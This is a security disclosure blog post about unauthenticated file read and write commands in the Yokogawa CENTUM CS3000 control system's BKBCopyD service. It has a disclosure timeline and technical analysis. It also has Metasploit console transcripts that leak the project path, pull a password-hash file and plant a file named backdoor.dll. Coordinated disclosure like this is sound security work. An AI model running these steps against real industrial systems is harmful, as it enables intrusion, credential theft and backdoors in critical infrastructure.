This blog post represents the final disclosure of the the Yokogawa CENTUM CS3000 vulnerability discussed by Tod Beardsley (@todb) and Jim Denaro (@cipherlaw) on their DEFCON talk, "How To Disclose an Exploit Without Getting in Trouble". A link to that talk, and the slides, will be available shortly.

Let's start with a quote from the Yokogawa description of their own product in order to introduce it: "Yokogawa released CENTUM CS 3000 R3 in 1998 as the first Windows-based production control system under our brand. For over 10 years of continuous developments and enhancements, CENTUM CS 3000 R3 is equipped with functions to make it a matured system. With over 7600 systems sold worldwide, it is a field-proven system with 99.99999% of availability."

Vulnerability Summary

The Yokogawa Centum CS3000 solution uses different services in order to provide all its functionality. The “BKBCopyD.exe” service, started when running the “FCS / Test Function”, listens by default on TCP/20111. There is a lack of authentication which makes possible to abuse several operations provided by the service in order to:

  • Leak the CENTUM project database location.
  • Read arbitrary files.
  • Write arbitrary files.

Reading and Writing to the file system will happen with the privileges of the CENTUM user.

Disclosure Timeline

DateDescription
March, 2014Client-Attorney Relationship Established between Cipherlaw Group and Rapid7
April 14, 2014Vulnerability details disclosed to attorney
May 1, 2014Details offered to vendor
June 25, 2014Details disclosed to CERTs
Aug 9, 2014Details, Metasploit module published as PR 3637

Technical Analysis

The “BKBCopyD.exe” service provides several operations, which can be abused without further authentication by anyone with network access to the service. The operations are described below:

  • PMODE: this command allows getting the value for environment variables. It includes the MR_DBPATH variable with the project path in the file system or network resource.
  • RETR: this command allows reading arbitrary files from the remote file system with the privileges of the CENTUM user. The service neither the command provide any additional authentication or authorization mechanism.
  • STOR: this command allows storing arbitrary files in the remote file system with the privileges of the CENTUM user. The service neither the command provide any additional authentication or authorization mechanism.

Exploitation

A working Metasploit module has been developed for Windows XP SP3 / Yokogawa Centum CS3000 R3.08.50, where is possible to leak the database location, retrieve and store arbitrary files:

  • Retrieving the database location with PMODE:
msf > use auxiliary/admin/scada/yokogawa_bkbcopyd_client
msf auxiliary(yokogawa_bkbcopyd_client) > set RHOST 172.17.1.63
RHOST => 172.17.1.63
msf auxiliary(yokogawa_bkbcopyd_client) > set action PMODE
action => PMODE
msf auxiliary(yokogawa_bkbcopyd_client) > run
 
 
[*] 172.17.1.63: 20111 - Sending PMODE packet...
[+] Success: 210 PMODE C:\CS3000\ENG\BKPROJECT\MYPJT\TestMaster\HIS0163\database command successful
  • Retrieving the project password database location with RETR:
msf auxiliary(yokogawa_bkbcopyd_client) > set action RETR
action => RETR
msf auxiliary(yokogawa_bkbcopyd_client) > set RPATH C:/CS3000/ENG/BKPROJECT/MYPJT/TestMaster/HIS0163/database/system/Password.odc
RPATH => C:/CS3000/ENG/BKPROJECT/MYPJT/TestMaster/HIS0163/database/system/Password.odc
msf auxiliary(yokogawa_bkbcopyd_client) > run
 
 
[*] 172.17.1.63: 20111 - Sending RETR packet...
[*] Server started.
[*] 172.17.1.63 - Getting data...
[+] /Users/redsadic/.msf4/loot/20140806223145_default_172.17.1.63_yokogawa.cs3000._ 687005.bin saved!
[*] 172.17.1.63 - Getting data...
[*] Server stopped.
[*] Auxiliary module execution completed
msf auxiliary(yokogawa_bkbcopyd_client) > cat /Users/redsadic/.msf4/loot/20140806223145_default_172.17.1.63_yokogawa.cs3000._ 687005.bin
[*] exec: cat /Users/redsadic/.msf4/loot/20140806223145_default_172.17.1.63_yokogawa.cs3000._ 687005.bin
 
 
#YDCS_PASSWORD PROJECT: MYPJT
OFFUSER:01a742f640f8a4c0b57feb7ae6e29099:1391182083
ONUSER:aad21bd26dae81dce52741595bea7beb:1391182083
ENGUSER:2550cc2337fcd119327b8d730476cfdc:1391182083
PROG:b08f11a7e028f607009ba4039d9bda0e:1391182083
TESTUSER:2dc22e16cbfae90fafd1a5d84e09b48f:1391182083
#!2712db741f4af7718f74fd179deacbe3msf
  • Placing remote files with STOR:
msf auxiliary(yokogawa_bkbcopyd_client) > set action STOR
action => STOR
msf auxiliary(yokogawa_bkbcopyd_client) > set LPATH /tmp/backdoor.dll
LPATH => /tmp/backdoor.dll
msf auxiliary(yokogawa_bkbcopyd_client) > set RPATH C:/CS3000/ENG/BKPROJECT/MYPJT/TestMaster/HIS0163/database/system/backdoor.dll
RPATH => C:/CS3000/ENG/BKPROJECT/MYPJT/TestMaster/HIS0163/database/system/backdoor.dll
msf auxiliary(yokogawa_bkbcopyd_client) > run
 
 
[*] 172.17.1.63: 20111 - Sending STOR packet...
[*] Server started.
[*] 172.17.1.63 - Sending data...
[*] Server stopped.
[*] Auxiliary module execution completed
msf auxiliary(yokogawa_bkbcopyd_client) >

Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions or comments.